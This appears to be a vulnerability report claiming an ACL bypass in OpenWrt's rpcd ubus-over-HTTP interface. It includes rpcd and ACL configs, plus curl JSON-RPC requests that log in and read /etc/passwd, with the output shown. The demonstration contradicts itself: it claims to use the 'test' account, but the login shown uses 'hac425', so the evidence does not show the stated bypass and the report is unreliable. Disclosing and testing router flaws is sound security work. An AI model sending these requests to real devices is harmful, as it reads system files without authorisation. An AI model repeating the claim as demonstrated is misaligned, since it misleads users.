User can access to ubus over HTTP. This way depend on rpcd service. When misconfigure the rpcd's ACL , It could lead the ACL don't work.
Steps to produce the problem
First you should get an machine running openwrt And install uhttpd and luci to provide http service
opkg update
opkg install luci
Then to install some tools to add users in openwrt。
opkg install shadow-common
opkg install shadow-useradd
opkg install rpcd-mod-file
And then I add 2 user and make them can login in rpcd by modiy the rpcd config file.
root@OpenWrt:~# cat /etc/config/rpcd
config login
option username 'hac425'
option password '$p$hac425'
list read '*'
list write '*'
config login
option username 'test'
option password '$p$test'
list read '*'
list write '*'
Next I create an config file for provide ACL to user who's username is hac425 (the config file come from wiki for openwrt
root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json
{
"hac425": {
"description": "acl for hac425",
"read": {
"ubus": {
"file": [ "*" ],
"log": [ "*" ],
"service": [ "*" ],
},
},
"write": {
"ubus": {
"file": [ "*" ],
"log": [ "*" ],
"service": [ "*" ],
},
}
}
}
root@OpenWrt:/usr/share/rpcd/acl.d#
This let hac425 can call all methods in file namespace ( "file": [ "*" ] )
I didn't create the acl file for user who's name is test, It mean that test user can only call the methods defined in unauthenticated.json.
However , when I test it , I found that the user test can also call the methods which is only allowed to hac425 user.
For example, The test user can call read method in file namespace which is not permited to him.
Next I would show it to you.
First I use test user's username and password to login , and get the ubus_rpc_session (this value should be used to call other method defined in Acl config files)
06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123" } ] }' http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}
Then use the ubus_rpc_session to call read method in file namespace to read the content of /etc/passwd
06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }' http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
hac425:x:1000:1000::/home/hac425:
test:x:1001:1001::/home/test:
"}]}
Then we could get the file content.
This means that I can use test user to call read method which is not permited to test user.
Bypass the acl.
Conclusion
The vulneratility may lead the rpcd acl don't work successful.
This lead the evil user can call the method which is only permited call by otherone user.